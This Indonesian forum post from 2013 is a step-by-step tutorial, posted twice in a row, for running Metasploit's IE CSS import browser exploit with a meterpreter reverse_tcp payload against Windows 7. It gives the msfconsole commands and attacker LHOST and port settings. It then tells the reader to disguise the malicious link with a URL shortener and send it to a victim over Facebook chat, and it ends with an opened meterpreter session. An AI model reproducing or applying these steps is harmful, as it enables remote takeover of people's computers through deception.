04-26-2013, 02:50 PM
ini sih sebenernya akal akalan nya si bleki orion , tapi ilmu emang buat dishare kok :d
langsung aja tutorial nya , maap berantakan
exploit ini memanfaatkan kelemahan browser IE om , windows 7 bisa lah , tergantung kitanya sang attacker =))
pertama jelas buka termanal dong
1. buka msfconsole ,, terserah sih mau pake armitage ato msfgui , lanjut masukkan command command nya bro.
msf > use exploit/windows/browser/ms11_003_ie_css_import
![[Image: 0o6izaax7dbyk346g.jpg?size_id=5]](http://www.mediafire.com/convkey/43d7/0o6izaax7dbyk346g.jpg?size_id=5)
2. lalu set payload nya , disini ane pake meterpreter/reverse_tcp
msf exploit(ms11_003_ie_css_import) > set payload windows/meterpreter/reverse_tcp
![[Image: q7vl0hf3rfwls5z6g.jpg]](http://www.mediafire.com/convkey/37e5/q7vl0hf3rfwls5z6g.jpg)
3. set ip LHOST nya , LHOST disini adalah ip ATTACKER dilanjutkan set URIPATH nya
msf exploit(ms11_003_ie_css_import) > set LHOST 192.168.151.14
msf exploit(ms11_003_ie_css_import) > set URIPATH /
![[Image: bg8c59ptz3eqtcd6g.jpg]](http://www.mediafire.com/convkey/a838/bg8c59ptz3eqtcd6g.jpg)
4. nah , yang ini terserah , untuk SRVPORT nya bisa make port yang belum kepakai , misal ane pakai port 8080 yang nanti akan ane convert link nya supaya gak ketahuan , kan aneh kalo ngasih link ada port 8080 nya.
Sebenernya bisa lebih mudah pakai port 80 , jadi kita tinggal arah kan TARGET ke ip kita makek ettercap dengan plugins dns_spoof. Tapi berhubung pas bikin nih tutor ane lagi chatting dipesbuk ya maka kepakailah port 80 tersebut.
Paham bro ? kalo nggak paham ya berarti sama , ane juga gak paham =))
msf exploit(ms11_003_ie_css_import) > set SRVPORT 8080
![[Image: tutt.png]](http://winnerawan.files.wordpress.com/2013/04/tutt.png)
5. Lanjut kita exploit
![[Image: uqb6ho1b09e1c9x6g.jpg]](http://www.mediafire.com/convkey/8e06/uqb6ho1b09e1c9x6g.jpg)
6. nah , http://192.168.151.14:8080
intinya bagaimana pun cara nya kita harus bisa mancing target buat buka tuh ip dengan port 8080 dll dengan browser internet explorer.
7. Disini ane pake teknik soceng sedikit , kita convert tuh link pake pendek.in
![[Image: 11hv2156l4gjj176g.jpg]](http://www.mediafire.com/convkey/c4df/11hv2156l4gjj176g.jpg)
8. Oke , setelah dipendekin , link nya berubah , jadi gak mencurigakan , selanjut nya kasih ke target bisa melalui apa kek , chat pesbuk misal nya , pikir sendiri yah.
![[Image: e3nvkbk381qt3ih6g.jpg]](http://www.mediafire.com/convkey/fc13/e3nvkbk381qt3ih6g.jpg)
9. saat target membuka link tersebut dengan browser IE akan terlihat seperti SS berikut.
![[Image: 9tvogrx2jlmdjht6g.jpg]](http://www.mediafire.com/convkey/0dbf/9tvogrx2jlmdjht6g.jpg)
10. Nah...seperti Ss diatas , terlihat kata "meterpreter session 1 opened"
![[Image: u6cwxdowlyyjdx96g.jpg]](http://www.mediafire.com/convkey/cc52/u6cwxdowlyyjdx96g.jpg)
coba di enter trus kita interaksi dengan meterpreter id 1
![[Image: z4c4dvui4tni4cl6g.jpg]](http://www.mediafire.com/convkey/3e2e/z4c4dvui4tni4cl6g.jpg)
nah , masuk sesi meterpreter , mari kita lihat info O.S nya
![[Image: ctlwtozbxs468yl6g.jpg]](http://www.mediafire.com/convkey/81e3/ctlwtozbxs468yl6g.jpg)
ckck windows 7 pwned :-?
ok, sekian tutorial dari saya , saya larcenciels ganteng mohon undur diri , sekian dan terimagaji =))
langsung aja tutorial nya , maap berantakan
exploit ini memanfaatkan kelemahan browser IE om , windows 7 bisa lah , tergantung kitanya sang attacker =))
pertama jelas buka termanal dong
1. buka msfconsole ,, terserah sih mau pake armitage ato msfgui , lanjut masukkan command command nya bro.
msf > use exploit/windows/browser/ms11_003_ie_css_import
![[Image: 0o6izaax7dbyk346g.jpg?size_id=5]](http://www.mediafire.com/convkey/43d7/0o6izaax7dbyk346g.jpg?size_id=5)
2. lalu set payload nya , disini ane pake meterpreter/reverse_tcp
msf exploit(ms11_003_ie_css_import) > set payload windows/meterpreter/reverse_tcp
![[Image: q7vl0hf3rfwls5z6g.jpg]](http://www.mediafire.com/convkey/37e5/q7vl0hf3rfwls5z6g.jpg)
3. set ip LHOST nya , LHOST disini adalah ip ATTACKER dilanjutkan set URIPATH nya
msf exploit(ms11_003_ie_css_import) > set LHOST 192.168.151.14
msf exploit(ms11_003_ie_css_import) > set URIPATH /
![[Image: bg8c59ptz3eqtcd6g.jpg]](http://www.mediafire.com/convkey/a838/bg8c59ptz3eqtcd6g.jpg)
4. nah , yang ini terserah , untuk SRVPORT nya bisa make port yang belum kepakai , misal ane pakai port 8080 yang nanti akan ane convert link nya supaya gak ketahuan , kan aneh kalo ngasih link ada port 8080 nya.
Sebenernya bisa lebih mudah pakai port 80 , jadi kita tinggal arah kan TARGET ke ip kita makek ettercap dengan plugins dns_spoof. Tapi berhubung pas bikin nih tutor ane lagi chatting dipesbuk ya maka kepakailah port 80 tersebut.
Paham bro ? kalo nggak paham ya berarti sama , ane juga gak paham =))
msf exploit(ms11_003_ie_css_import) > set SRVPORT 8080
![[Image: tutt.png]](http://winnerawan.files.wordpress.com/2013/04/tutt.png)
5. Lanjut kita exploit
![[Image: uqb6ho1b09e1c9x6g.jpg]](http://www.mediafire.com/convkey/8e06/uqb6ho1b09e1c9x6g.jpg)
6. nah , http://192.168.151.14:8080
intinya bagaimana pun cara nya kita harus bisa mancing target buat buka tuh ip dengan port 8080 dll dengan browser internet explorer.
7. Disini ane pake teknik soceng sedikit , kita convert tuh link pake pendek.in
![[Image: 11hv2156l4gjj176g.jpg]](http://www.mediafire.com/convkey/c4df/11hv2156l4gjj176g.jpg)
8. Oke , setelah dipendekin , link nya berubah , jadi gak mencurigakan , selanjut nya kasih ke target bisa melalui apa kek , chat pesbuk misal nya , pikir sendiri yah.
![[Image: e3nvkbk381qt3ih6g.jpg]](http://www.mediafire.com/convkey/fc13/e3nvkbk381qt3ih6g.jpg)
9. saat target membuka link tersebut dengan browser IE akan terlihat seperti SS berikut.
![[Image: 9tvogrx2jlmdjht6g.jpg]](http://www.mediafire.com/convkey/0dbf/9tvogrx2jlmdjht6g.jpg)
10. Nah...seperti Ss diatas , terlihat kata "meterpreter session 1 opened"
![[Image: u6cwxdowlyyjdx96g.jpg]](http://www.mediafire.com/convkey/cc52/u6cwxdowlyyjdx96g.jpg)
coba di enter trus kita interaksi dengan meterpreter id 1
![[Image: z4c4dvui4tni4cl6g.jpg]](http://www.mediafire.com/convkey/3e2e/z4c4dvui4tni4cl6g.jpg)
nah , masuk sesi meterpreter , mari kita lihat info O.S nya
![[Image: ctlwtozbxs468yl6g.jpg]](http://www.mediafire.com/convkey/81e3/ctlwtozbxs468yl6g.jpg)
ckck windows 7 pwned :-?
ok, sekian tutorial dari saya , saya larcenciels ganteng mohon undur diri , sekian dan terimagaji =))